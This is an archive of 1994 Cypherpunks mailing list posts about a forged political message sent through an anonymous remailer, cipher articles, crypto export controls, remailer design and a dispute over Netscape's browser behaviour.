Date: Sun, 11 Dec 94 15:25:38 PST
Subject: Netscape competence
Message-ID: <199412112330.SAA25547@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Adam Shostack writes:
> Until you hire the experts mentioned below, I'll continue to assume that your talent mix does not include said experts.

Whoops, sorry, Marc A. had the attribution correct after all. Amanda W. made some similar comments, but apparently I'm conflating the two. Please ignore my prior message.

-L. Futplex McCarthy

---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

From schneier at chinet.chinet.com Sun Dec 11 15:26:26 1994
From: schneier at chinet.chinet.com (Bruce Schneier)
Date: Sun, 11 Dec 94 15:26:26 PST
Subject: Articles on RC5 and GOST in January 95 Dr Dobbs Journal
Message-ID:

In the Jan 95 issue of Dr Dobbs Journal, you will find the following:

    An editorial on the public release of RC4 (without code).
    An article by me on GOST (with code).
    An article by Ron Rivest on RC5 (without code).

Remember, you can export cryptographic source code in paper form.

Bruce

From hfinney at shell.portal.com Sun Dec 11 15:39:06 1994
From: hfinney at shell.portal.com (Hal)
Date: Sun, 11 Dec 94 15:39:06 PST
Subject: Storm Brewing Over Forged Bob Rae Posting?
In-Reply-To: <199412112037.MAA16882@netcom18.netcom.com>
Message-ID: <199412112338.PAA18920@jobe.shell.portal.com>

Ironically, I did not know about this brouhaha until reading about it here today. A few days ago I got this email:

    Subject: Premier Bob
    To: hfinney at jobe.shell.portal.com
    Date: Fri, 9 Dec 94 8:10:36 EST

    Congratulations! Your forgery made the Globe and Mail today.

This meant nothing to me so I ignored it. But on reading the article this appears to be a major incident, involving heated accusations and walkouts on the floor of the Ontario legislature. The Portal system, the internet service provider I use, has apparently taken some heat but they have not contacted me.

A thread in can.politics titled "The Bob Rae Forgery Caper" includes a copy of the original message. Here are some excerpts from the Globe and Mail article, which was widely cross-posted.
>TORONTO - Progressive Conservative Leader Michael Harris caused an uproar in the Ontario Legislature yesterday by presenting a prank letter circulating on the Internet computer system that is purported to have been written by Premier Bob Rae.
> The computer message has Mr. Rae making tasteless references to Ontario's Attorney-General Marion Boyd and commenting on the trial of Karla Homolka, who was convicted in the slayings of two Ontario schoolgirls.
> A copy of the letter obtained by The Globe and Mail warns that "this message is NOT from the person listed in the from line. It is from an automated software remailing service" in California. This message was on the letter from the time the company received it and passed it on to the computer bulletin board where Internet users can read it, said Gwen Rachlin, director of operations for Portal Communications of Cupertino, Calif., through which the message was posted.
>[...]
> Ms. Rachlin said the company received a call from police about the letter yesterday afternoon. But she said the company had already had "some incidents" with the source of the message. She added that she was ready to co-operate with the police.
> The source of the message was an account that provides a service that allows people anonymous access to the Internet, she said.
> Mr. Sherman said it is very easy to post a false message on a bulletin board and to make it appear that it came from a computer different from the one that sent it.
> By going through a California bulletin board, "obviously someone has gone way out of their way to send that in," Mr. Sherman added.
> Even so, the message can be traced, said Rick Broadhead, co-author of The Canadian Internet Handbook. "If they [the sender] have gone through a service, it is going to take some more work to trace it," Mr. Broadhead said. But looking at the log records of the computer service, police can follow the message back to the originating computer.

I do not have any logs of this message. However, my remailer does not insert any delays so it is conceivable that sendmail logs could give some insight into message flow through the remailer. I don't know what obligation I would be under to cooperate with any investigation. The message itself had some pointed political satire but did not look to me to violate any US laws. There is not much I can do to help, anyway.

The article indicated that the legislature has now gone into recess for the year so hopefully this will all be old news by the time they reconvene.

One thing I do notice on reading the discussion in can.politics is the fact that despite the disclaimers in the message headers, some people took this as a forgery attempt on my part. I wonder if it might be necessary to insert disclaimers into the body of the message as anon.penet.fi does, at least for messages to known mail-to-news gateways.

There was also a misperception that my remailer was an official effort endorsed by Portal (again, despite the disclaimers). Note that it was they who were contacted, not me (yet). This might suggest that it will not be possible to cleanly separate the remailer operators and service providers when problems like this arise. Both may end up being hassled (time will tell whether I am). It should be interesting to see what happens.

Hal

From ianf at sydney.sgi.com Sun Dec 11 15:42:22 1994
From: ianf at sydney.sgi.com (Ian Farquhar)
Date: Sun, 11 Dec 94 15:42:22 PST
Subject: A few articles of interest...
In-Reply-To: <199412111825.KAA24116@desiree.teleport.com>
Message-ID: <9412121029.ZM10788@wiley.sydney.sgi.com>

Whoops. I have a nasty feeling that a brushed key might just have sent an unedited version to the list. If so, my apologies.

On Dec 11, 10:27am, Alan Olsen wrote:
> - Bruce Schneier has an article on GOST. (A Soviet variant on DES.)

GOST is not a variant on DES. It is the Soviet equivalent of DES. The algorithms do have some similarities (eg.
the use of S-boxes to provide diffusion), it is a Feistel network, but is in other ways interestingly different. I believe that it has been undergoing quite a bit of Western cryptanalysis over the past year, although I have not seen any results as yet.

IMO, one of the most interesting features of GOST is that the S-boxes are not specified in the algorithm's definition. Apparently you had to apply to the government for them, and they would respond with ones they wanted you to have. It is presumed that the security of the ones you were given depended on how much they trusted you, and how much they wanted what you were protecting to remain a secret.

I recall that Matt (?) posted a set of standard non-classified (probably low-security) Soviet S-boxes for GOST a couple of months ago.

Ian.

From werewolf at io.org Sun Dec 11 15:47:31 1994
From: werewolf at io.org (Mark Terka)
Date: Sun, 11 Dec 94 15:47:31 PST
Subject: Storm Brewing Over Forged Bob Rae Posting?
In-Reply-To: <199412112031.MAA21646@netcom12.netcom.com>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

In article <199412112031.MAA21646 at netcom12.netcom.com>, mpd at netcom.com (Mike Duvos) wrote:
> > Now all the lame press (and some even LAMER USENET readers) are screaming foul. I bet there will be renewed interest in the cypherpunk remailer's in the next few days :>
>
>I suppose this means we need strong laws against "message laundering."

Hey, don't kid yourself! I have read comments to the extent that anon remailers like the cypherpunks system should be BANNED! Seriously....another good reason for putting more in Europe if possible.

Here's an idea. Someone mentioned trying to set up an anon remailer on the North American Freenets, but it seemed there were software compatibility problems. Well, if we could solve the problem, assuming the Freenets in Europe use the same software, we could set a few up in Europe ourselves from this side of the pond.
You could telnet into a Euro-Freenet (although some like Helsinki had restrictions on members being citizens of the country) establish an account and then e-mail the software to your account overseas.

Would this be practical? Sounds like it would be worth a shot. But again, I guess it comes down to the software compatibility problem.

From ianf at sydney.sgi.com Sun Dec 11 15:56:29 1994
From: ianf at sydney.sgi.com (Ian Farquhar)
Date: Sun, 11 Dec 94 15:56:29 PST
Subject: Articles on RC5 and GOST in January 95 Dr Dobbs Journal
In-Reply-To:
Message-ID: <9412121048.ZM10865@wiley.sydney.sgi.com>

On Dec 11, 5:25pm, Bruce Schneier wrote:
> Remember, you can export cryptographic source code in paper form.

Now there's an interesting thought...

Many of you will remember the heady days of the early 1980's, when it was customary for PC magazines to include substantial amounts of code in their pages (often 25% or so of the magazine). This all had to be typed in by hand, and especially in the case of BASIC programs (there was only BASIC in those days really, it was the lowest common denominator) containing machine code, they would also almost always have checksums to make sure that what was typed in was correct.

This was never a lot of fun. I did it a few times myself. That cured me for life from repeating the exercise.

Around the mid 1980's a rather interesting device appeared. It was essentially an automated scanner for high-density barcodes.
You photocopied the magazine page containing these 25 cm (or whatever) barcode strips, which you fed into the reader. It scanned the contents of the barcode, and voila, a working program. At least in theory. The downfall of this system is that the reader cost several hundred dollars, and almost nobody could afford them. It never quite caught on.

Even so, I really wonder if the export of cryptography ON PAPER but in a machine-readable form would be in violation of ITAR? If anyone has one of these old scanners, it might very well be worth trying.

Ian.

From jamesd at netcom.com Sun Dec 11 16:15:34 1994
From: jamesd at netcom.com (James A. Donald)
Date: Sun, 11 Dec 94 16:15:34 PST
Subject: Storm Brewing Over Forged Bob Rae Posting?
In-Reply-To: <199412112338.PAA18920@jobe.shell.portal.com>
Message-ID: <199412120014.QAA10945@netcom10.netcom.com>

Hal writes
> One thing I do notice on reading the discussion in can.politics is the fact that despite the disclaimers in the message headers, some people took this as a forgery attempt on my part. I wonder if it might be necessary to insert disclaimers into the body of the message as anon.penet.fi does, at least for messages to known mail-to-news gateways.

Relax: The world has an unlimited supply of idiots, and nobody takes them seriously.

If you have ever posted satires, you will observe that no matter how blatant the satire, and how many clues you put in that it is a satire, you will always get indignant replies that take you seriously.

--
---------------------------------------------------------------------
We have the right to defend ourselves and our property, because of the kind of animals that we are. True law derives from this right, not from the arbitrary power of the omnipotent state.
James A. Donald
jamesd at netcom.com

From jrochkin at cs.oberlin.edu Sun Dec 11 16:16:05 1994
From: jrochkin at cs.oberlin.edu (Jonathan Rochkind)
Date: Sun, 11 Dec 94 16:16:05 PST
Subject: Broadcasts and the Rendezvous Problem
Message-ID:

At 5:48 PM 12/11/94, L. Todd Masco wrote:
>This is where my train of thought dovetails with the newsgroup question: bringing a new remailer on line could be achieved by broadcasting a message through a newsgroup specifying the location and type of the remailer. If necessary, one or more pseudonymous automatic testing agents could pick up the message and put the remailer through a barrage of tests, broadcasting a "remailer certification" with a certain duration. "Premail++" and remailers could find their next hop by examining current certifications and choosing one with desired characteristics, scoring by trusted testing agents and other criteria (including the passage of time since the last certification). If an exit-remailer is chosen early in the game, multiple paths to the exit-remailer can be used to improve reliability (exit-remailers would also probably have a shorter cycle of certification).

I tried to discuss a very similar plan several months ago (maybe as long ago as a year, I don't remember). No one seemed interested in it. Many people seemed to think that a newsgroup for this sort of a thing was a waste of bandwidth. I don't really agree, and think that the bandwidth is necessary for a distributed method of making the remailer net more robust to remailers popping into and out of existence.

I still think it's a good idea though. shrug. maybe people will like it better this time around.

From tcmay at netcom.com Sun Dec 11 16:18:01 1994
From: tcmay at netcom.com (Timothy C.
May)
Date: Sun, 11 Dec 94 16:18:01 PST
Subject: Articles on RC5 and GOST in January 95 Dr Dobbs Journal
In-Reply-To: <9412121048.ZM10865@wiley.sydney.sgi.com>
Message-ID: <199412120017.QAA18598@netcom14.netcom.com>

Ian Farquhar wrote:
> Many of you will remember the heady days of the early 1980's, when it was customary for PC magazines to include substantial amounts of code in their pages (often 25% or so of the magazine). This all had to be typed in by
...
> Around the mid 1980's a rather interesting device appeared. It was essentially an automated scanner for high-density barcodes. You photocopied the magazine page containing these 25 cm (or whatever) barcode strips, which you fed into the reader. It scanned the contents of the barcode, and voila, a working program. At least in theory. The downfall of this system is that the reader cost several hundred dollars, and almost nobody could afford them. It never quite caught on.

"Cauzin Softstrips" was the product, as I recall. I wouldn't use the word "quite" in "It never quite caught on," except in irony, as I'm pretty sure essentially _no_ such machines were sold. Maybe a few, but not many more.

> Even so, I really wonder if the export of cryptography ON PAPER but in a machine-readable form would be in violation of ITAR? If anyone has one of these old scanner, it might very well be worth trying.

We had this discussion a while back, when Phil Karn was trying for an export license for Bruce's software. OCR recognition rates are already close to 100% for monospaced fonts like Courier (at least many of us see this...I have TypeReader and it does very well with such fonts), and could be made even higher.

In my view, the whole export issue is a joke anyway. Anyone with access to Bruce's code could quite easily remail it, with or without first hiding the exact form by compressing, encrypting, or stegging it.

That this hasn't happened--so far as we (or I) know--says more about other things than about the laws supposedly barring such export.

I'm not saying it wouldn't be an interesting test case, though. Hard to imagine it happening. I expect the test case could come just as easily by printing up the code in Courier, or OCR2, and prominently putting "Insert this end into OCR machine" or somesuch....and then calling attention to this as one crosses the borders. (I'd guess the outgoing Customs inspection would be nonexistent, as usual, and that such an attempt to trigger a test case would be fruitless.)

--Tim May

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com     | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay

From amanda at intercon.com Sun Dec 11 16:30:00 1994
From: amanda at intercon.com (Amanda Walker)
Date: Sun, 11 Dec 94 16:30:00 PST
Subject: Netscape competence
Message-ID: <199412120029.TAA00724@intercon.com>

    Excuse me, but Adam Shostack didn't write that paragraph you quoted. Amanda Walker did, as I recall.

Nope, Adam wrote it. I just followed up to him with additional vitriol :).

Amanda Walker
InterCon Systems Corporation

From werewolf at io.org Sun Dec 11 16:33:53 1994
From: werewolf at io.org (Mark Terka)
Date: Sun, 11 Dec 94 16:33:53 PST
Subject: Globe and Mail Article On Forged Posting
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

Ok, here is the text of the story about the "Forged Bob Rae Posting" from the Toronto Globe and Mail.
An examination of the story only indicates how far our journalists and politicians have to go in understanding the Internet!

============================================================================

Tories cause uproar in legislature

Rae furious after Harris distributes prank letter circulating on Internet

From THE GLOBE AND MAIL, Toronto, December 9, 1994 pg A6

BY JAMES RUSK and MARTIN MITTELSTAEDT
Queen's Park Bureau

TORONTO - Progressive Conservative Leader Michael Harris caused an uproar in the Ontario Legislature yesterday by presenting a prank letter circulating on the Internet computer system that is purported to have been written by Premier Bob Rae.

The computer message has Mr. Rae making tasteless references to Ontario's Attorney-General Marion Boyd and commenting on the trial of Karla Homolka, who was convicted in the slayings of two Ontario schoolgirls.

A copy of the letter obtained by The Globe and Mail warns that "this message is NOT from the person listed in the from line. It is from an automated software remailing service" in California. This message was on the letter from the time the company received it and passed it on to the computer bulletin board where Internet users can read it, said Gwen Rachlin, director of operations for Portal Communications of Cupertino, Calif., through which the message was posted.

However, the copy distributed by the Conservatives yesterday did not contain any notice that it was a fake, and Mr. Harris made the sensational claim that the letter could indicate a security lapse in the Premier's Office.

A furious Mr. Rae criticized Mr. Harris outside the legislature, accusing him of leading to the "Americanization of Canadian politics" through the use of "dirty tricks."

"I really do think that Mr. Harris has reached a genuine new low. I think it's a low that I hadn't anticipated he would hit, but in my book he's hit it," Mr. Rae said.

It is relatively easy for an Internet user to send fake messages on the system, which links millions of computer users around the world. But Mr. Harris said a lapse could have occurred in the Premier's Office, allowing someone to send the letter.

Mr. Harris told reporters that he raised the issue out of a sense of worry that foreign governments could get on the Internet and place fake messages about the province. He was quick to add that he didn't think the Premier wrote the letter.

"Clearly it didn't come from the Premier or anyone close to the Premier. But it does raise the security question," Mr. Harris told reporters.

Mr. Rae lashed out at what he called "the dirty tricks stuff, the right-wing nonsense that he's coming up with every day. . . and then this stuff."

When Mr. Rae found out Mr. Harris's aides had distributed the letter to the media, he said he couldn't believe the party "would engage in that kind of tactic. This is unbelievable. Today, you have managed to lower the tone of this place."

The Premier then stormed out, and the Speaker called a 15-minute recess to allow the tempers of the MPPs, many of whom were shouting at each other, to cool. It was the last day of this sitting of the House.

The copy of the letter distributed by the Tories to the media had the obscene references blacked out, although Mr. Harris had given Mr. Rae an original copy.

A press release issued by the Conservatives referred to Mr. Rae as "road-kill on the Information Highway," and exulted, "Internet Bob: the hacker is hacked."

Mr. Rae called these comments "bizarre."

The phony message, which was posted on Saturday in a computer bulletin board called ont.general, was discovered by the Premier's Office on Tuesday, but the office decided that it could do nothing about it. Mr. Rae recently announced that he had an address on the Internet.

Ont.general is a computer bulletin board on which Internet users discuss life and public issues in the province, said Larry Sherman, president of Internet Seminars of Woodbridge.

A message can be removed from the board only by whoever posted it, and it was decided that to make a fuss about it would draw unnecessary attention to it, an official in the Premier's Office said.

The official, who asked not to be named, said the office has not launched an investigation into where the message came from.

Ms. Rachlin said the company received a call from police about the letter yesterday afternoon. But she said the company had already had "some incidents" with the source of the message. She added that she was ready to co-operate with the police.

The source of the message was an account that provides a service that allows people anonymous access to the Internet, she said.

Mr. Sherman said it is very easy to post a false message on a bulletin board and to make it appear that it came from a computer different from the one that sent it.

By going through a California bulletin board, "obviously someone has gone way out of their way to send that in," Mr. Sherman added.

Even so, the message can be traced, said Rick Broadhead, co-author of The Canadian Internet Handbook. "If they [the sender] have gone through a service, it is going to take some more work to trace it," Mr. Broadhead said. But looking at the log records of the computer service, police can follow the message back to the originating computer.

The use by the Conservatives of the fake letter again puts the spotlight on the party. Last month, the Tories played pranks at an NDP convention sending in a camera crew that shot pictures ridiculing Mr. Rae, including a doctored video sequence that seemed to give the Premier a stutter. The pictures were broadcast as dinner-time entertainment at a Conservative convention the same weekend.
The Tories also bought a copy of a labour bill sold at an NDP fund raising and paraded it around their convention like a captured trophy. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 -----END PGP SIGNATURE----- From fhalper at pilot.njin.net Sun Dec 11 16:36:43 1994 From: fhalper at pilot.njin.net (Frederic Halper) Date: Sun, 11 Dec 94 16:36:43 PST Subject: What Happened to Xenon ? Message-ID: <9412120036.AA22711@pilot.njin.net> It seems he lost his Internet access (I think he moved to work at some university which does not have an Internet node). The Macintosh Cryptography Interface Project list which he started to make some progress in getting a Mac-like interface for PGP still exists. I can give you the necessary info if you'd like. -RH- --------------------------------------------------------------------------------- Reuben Halper I'm not growing up, I'm just burnin' out." Montclair High - Green Day - Montclair, NJ E-mail: fhalper at pilot.njin.net PGP 2.6ui Public Key available upon request --------------------------------------------------------------------------------- From amanda at intercon.com Sun Dec 11 16:41:41 1994 From: amanda at intercon.com (Amanda Walker) Date: Sun, 11 Dec 94 16:41:41 PST Subject: BofA+Netscape Message-ID: <199412120041.TAA00883@intercon.com> > Amanda complained that Netscape pisses all over the > standardization committees. > > Well guys, the victor has room to move. It must come as a big > shock to Apple, Microsoft, and IBM, but reality is that Netscape > can set WWW standards and they cannot. I disagree. 
The WWW is no longer a research project, and if it is to survive it will have to do so by consensus, either formal or informal. That's what standards committees, and groups like the IETF, exist to facilitate. The alternative is fragmentation, which we're already starting to see (in part because of Netscape's unilateral changes to HTML). Let me re-iterate something here: I'm biased. I'm a commercial vendor. I'm perfectly happy to live by the sword and die by the sword if that's how the market ends up--I just think it would be better for the Internet as a whole if the actual on-the-wire protocols and formats become standards, so that people don't have to worry about what clients or servers they are talking to. UI, performance, service, and such are fair game. Infrastructure has to be consensus-based or it fails. But hey, if Netscape can innovate by fiat, so can anyone else. Right now, I'm betting that Netscape will decide it's worth cooperating with the standards process. If they don't, they'll just fragment their own market. I can live with that, but I think it would be a shame. Amanda Walker InterCon Systems Corporation From jrochkin at cs.oberlin.edu Sun Dec 11 16:51:50 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Sun, 11 Dec 94 16:51:50 PST Subject: Articles on RC5 and GOST in January 95 Dr Dobbs Journal Message-ID: At 7:17 PM 12/11/94, Timothy C. May wrote: >In my view, the whole export issue is a joke anyway. Anyone with >access to Bruce's code could quite easily remail it, with or without >first hiding the exact form by compressing, encrypting, or stegging >it. > >That this hasn't happened--so far as we (or I) know--says more about >other things than about the laws supposedly barring such export. Well, it might actually say quite a bit about such laws, namely that they scare people into _not_ remailing Bruce's code. As is the point of such laws, obviously. So they appear to be working, right? 
People don't want to do something that is illegal, even if it would be easy to do so. But I had actually kind of assumed that this sort of thing _had_ happened. If anyone in some other country wanted to get a hold of Bruce's code, it would not be difficult to do so. And I figure someone probably has wanted to do such a thing, and probably has done it. If anyone out in non-U.S. land wants Bruce's code, and has been unable to get a hold of it, I bet a posting to alt.privacy.anon-server, or to the cypherpunks list, would result in people volunteering (via anon remailers, of course) to break the export laws. The non-U.S. citizens asking for the code wouldn't be breaking any laws, so they don't even need to use an encrypted address block, they can just ask publicly. A U.S. citizen using PGP and going through a chain of 8 or 10 remailers (including non-U.S. ones) is not likely to be caught. Of course I'd never do such a thing, especially after talking about it publicly on cypherpunks. From amanda at intercon.com Sun Dec 11 16:56:40 1994 From: amanda at intercon.com (Amanda Walker) Date: Sun, 11 Dec 94 16:56:40 PST Subject: Further comments on Netscape et al. 
Message-ID: <9412111956.AA21598@eldamar.walker.org> -----BEGIN PRIVACY-ENHANCED MESSAGE----- Proc-Type: 4,MIC-CLEAR Content-Domain: RFC822 Sigh. I wasn't intending to ignite a firestorm on the list, especially on a topic that is at this point only marginally crypto-related. I bear Netscape and its staff no ill will--they have done some wonderful stuff, and I'd be more than happy to compete with them however the market ends up. I am irritated by some of how they've gone about things, but this is as much cultural as anything else--the market will decide in the end, whatever they or anyone else do. If I have offended anyone on the list or at Netscape, I'm completely willing to continue the discussion in email, comp.infosystems.www, or wherever else, but I'm going to stop sending my replies to cypherpunks at this point unless they actually have to do with cryptography or WWW security per se. Vendors do take potshots at each other from time to time; I'm sorry that I indulged myself and did so on this list instead of in a more appropriate manner. 
Amanda Walker InterCon Systems Corporation -----END PRIVACY-ENHANCED MESSAGE----- From shamrock at netcom.com Sun Dec 11 17:05:44 1994 From: shamrock at netcom.com (Lucky Green) Date: Sun, 11 Dec 94 17:05:44 PST Subject: Broadcasts and the Rendezvous Problem Message-ID: Tim wrote: >L. Todd Masco wrote: > >> Seems to me that one of the fundamental building blocks necessary to >> a host of anonymous services is a means of rendezvousing in a manner that >> is not vulnerable to traffic analysis. >> >> The obvious solution to this is through the use of a broadcast medium. >> Has anybody created an alt.* group purely for remailer-associated >> rendezvous? > >Isn't this what "alt.anonymous.messages" is all about? > >(It's been at my Netcom site for many months now...I don't recall who >created it, but it seems to me it was one of us.) Which brings us back to the news -> mail gateway. There has to be a better way. I know that a small fraction of the net goes via satellite. Is there a way to inject truly anonymous datagrams? Any hams out there? -- Lucky Green PGP encrypted mail preferred. From shamrock at netcom.com Sun Dec 11 17:05:45 1994 From: shamrock at netcom.com (Lucky Green) Date: Sun, 11 Dec 94 17:05:45 PST Subject: BofA+Netscape Message-ID: [Welcome to the list, Marc. Great to have you here!] Marc Andreessen wrote >In article <9412111647.AA23311 at tadpole.tadpole.com>, db at Tadpole.COM (Doug >Barnes) wrote: > >> I'll throw in that from the perspective of someone running a server, >> their approach of requesting all graphics simultaneously over >> different sockets in the name of client performance is disastrous. >> This causes most servers to fork N times more per page, where N is >> the avg. # of graphics. > >That's just plain not true. Servers don't fork any more often >with Netscape than they do with other clients -- EVER. > >> but some have speculated that this was done deliberately in order to >> sabotage server software other than their own. 
> >That's also just plain not true, and completely unsubstantiated. Marc, have you ever been in an empty lab with an htpd server - late at night? You can HEAR it when Mozzilla hits the site. Two or three Mozzilla users at the same time will kill your server. Unless, I understand, it uses your server software for which you charge money. Can you be surprised that there are a significant number of people out there who are wondering if your "selfless" deed of giving away your client software for free was really all that selfless? -- Lucky Green PGP encrypted mail preferred. From shamrock at netcom.com Sun Dec 11 17:10:40 1994 From: shamrock at netcom.com (Lucky Green) Date: Sun, 11 Dec 94 17:10:40 PST Subject: Storm Brewing Over Forged Bob Rae Posting? Message-ID: Tim wrote: >In yet another piece of news, Netcom has apparently been >hacked/attacked rather badly. The "netcom.general" discussion group >(local to Netcom) is filled with garbage posts, forged posts, >cancelled articles, etc. Messages about "root" being forged appeared, >then disappeared. Netcom is quiet on this, but has been running >"crack" on all of their machines for the last several days--apparently >to (somehow?) help to find security flaws....I have no idea why >running crack to find weak passwords of users is such a high priority. >Maybe the apparent attack is related, maybe not. Netcom has unauthorized access problems for the longest time. My account has been deleted three times in as many months. Neither sysadmin nor accounting had any explanation or record of the deletion. No, I didn't owe them money. This has not been an isolated incident (see the article about Netcom under the fitting title "Sysadmins without a clue" in the Summer '94 issue of 2600). Netcom states in their announcement in netcom.announce that the passwords compromised were of a type that could be found in a dictionary attack. This would explain why they are running crack. Seems someone else has run crack before them. 
It also seems that root at netcom.com made the mistake of choosing a pw that is subject to a dictionary attack. Well, sysadmins without a clue. -- Lucky Green PGP encrypted mail preferred. From marca at neon.mcom.com Sun Dec 11 17:17:59 1994 From: marca at neon.mcom.com (Marc Andreessen) Date: Sun, 11 Dec 94 17:17:59 PST Subject: BofA+Netscape Message-ID: >have you ever been in an empty lab with an htpd server - late at night? You >can HEAR it when Mozzilla hits the site. Two or three Mozzilla users at the >same time will kill your server. Unless, I understand, it uses your server >software for which you charge money. Wrong wrong wrong, not true, false, unsubstantiated, in error. Attached is a note from the author of WinHTTPD that answers a similar accusation made in news last month. Marc > Newsgroups: comp.infosystems.www.users > Path: flop.mcom.com!news.Stanford.EDU!agate!howland.reston.ans.net!ix.netcom.com!netcom.com!rdenny > From: rdenny at netcom.com (Robert Denny) > Subject: Use WinHTTPD 1.3e! (was: Everyone Please Read!...) > Message-ID: > Organization: NETCOM On-line Communication Services (408 261-4700 guest) > References: <3bcqc1$s7e at news.doit.wisc.edu> <3bfkrg$4a4 at huron.eel.ufl.edu> > Date: Wed, 30 Nov 1994 02:48:54 GMT > Lines: 21 > > In <3bfkrg$4a4 at huron.eel.ufl.edu> chris at surgery.ufl.edu (Chris Barnett) writes: > > >There must be something wrong with your server. I'm running WinHTTPD1.3e > >on a 486-33 w/8MB o' ram and I don't have any problems with Netscape. I > >use Netscape all the time and I've had lots of people using Netscape > >access my server without any problems at all. Granted, there is practically > >nothing on my site (people that said they would write homepages for their > >divisions haven't yet), but I do have a pretty steady load of users and I > >haven't had any problems. Asking everyone else on the Net to change simply > >won't work. 
> > The irritating thing about this affair is that I have been very vocal about > the latent problems that Netscape uncovered in my server, and I fixed them > as fast as anyone could possibly hope for... I posted an announcement here, > and most every day I reply to some message with the URL of the Windows > HTTPD server's home page. My mail address is all over the docs, and I > have no record of the gentleman asking me about the problem... > > I know, "quit whining and get a life!"... :-) > > -- Bob -- Marc Andreessen Netscape Communications Corporation Mountain View, CA marca at mcom.com From tcmay at netcom.com Sun Dec 11 17:18:33 1994 From: tcmay at netcom.com (Timothy C. May) Date: Sun, 11 Dec 94 17:18:33 PST Subject: Articles on RC5 and GOST in January 95 Dr Dobbs Journal In-Reply-To: Message-ID: <199412120118.RAA03222@netcom17.netcom.com> Jonathan Rochkind wrote: > But I had actually kind of assumed that this sort of thing _had_ happened. > If anyone in some other country wanted to get a hold of Bruce's code, it > would not be difficult to do so. And I figure someone probably has wanted > to do such a thing, and probably has done it. I'm confused. Isn't this precisely what I was saying in my post? That if anyone really wanted it, it's easily and anonymously remailed? I'm not saying no one wants it. As pedagogic material, with the text, it's very useful. But it's not "productized" into a standalone, runnable, item that a lot of people can use (like PGP, for example). > If anyone out in non-U.S. land wants Bruce's code, and has been unable to > get a hold of it, I bet a posting to alt.privacy.anon-server, or to the > cypherpunks list, would result in people volunteering (via anon remailers, > of course) to break the export laws. The non-U.S. citizens asking for the > code wouldn't be breaking any laws, so they don't even need to use an > encrypted address block, they can just ask publicly. A U.S. 
citizen using > PGP and going through a chain of 8 or 10 remailers (including non-U.S. > ones) is not likely to be caught. Which is what I said in my post. --Tim -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From jdwilson at gold.chem.hawaii.edu Sun Dec 11 17:32:30 1994 From: jdwilson at gold.chem.hawaii.edu (NetSurfer) Date: Sun, 11 Dec 94 17:32:30 PST Subject: Storm Brewing Over Forged Bob Rae Posting? Message-ID: <199412120137.UAA26688@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- On Sun, 11 Dec 1994, Mark Terka wrote: > Here's an idea. Someone mentioned trying to set up an anon remailer on the > North American Freenets, but it seemed there were software compatibility > problems. > > Would this be practical? Sounds like it would be worth a shot. But again, I > guess it comes down to the software compatibility problem. Yep, if you get info on Freeport (the most common Freenet software) they tell you up front that you will need a Unix programmer and network type to install and maintain it. And it isn't freeware, regardless of the name. It is a time-period license which you have to renew every few years... - -NetSurfer #include >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> == = = |James D. Wilson |V.PGP 2.7: 512/E12FCD 1994/03/17 > " " o " |P. O. 
Box 15432 | finger for full PGP key > " " / \ " |Honolulu, HI 96830 |====================================> \" "/ G \" |Serendipitous Solutions| Also NetSurfer at sersol.com > >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuupQyoZzwIn1bdtAQFD2gGAlu98f5K0uCamNSj9MGxNYZ3hjp8c4kLf 7a4B4ZhyI77vYtwdZ0PMtB9SjS3QDmPk =JA0O -----END PGP SIGNATURE----- From jamesd at netcom.com Sun Dec 11 17:33:08 1994 From: jamesd at netcom.com (James A. Donald) Date: Sun, 11 Dec 94 17:33:08 PST Subject: BofA+Netscape In-Reply-To: <199412120041.TAA00883@intercon.com> Message-ID: <199412120131.RAA14755@netcom10.netcom.com> I wrote: > > Well guys, the victor has room to move. It must come as a big > > shock to Apple, Microsoft, and IBM, but reality is that Netscape > > can set WWW standards and they cannot. Amanda Walker writes > I disagree. The WWW is no longer a research project, and if it is to > survive it will have to do so by consensus, either formal or informal. > That's what standards committees, and groups like the IETF, exist to > facilitate. Consensus between who and who? When they implement crypto, perhaps they should listen to us cypherpunks, but when they add new SGML tags, and new subfields for existing tags, why should they give a tinkers dam what Apple thinks? Now plainly they should listen very carefully to what the guys at CERN say about SGML tags, but as far as I can see, the groups that you want them to take consensus with, have no standing in this matter. What right has apple got to demand that its views be considered? They should discuss SGML with Mosaic, and encryption with RSA, but I have seen little good come out of these standards committees. 
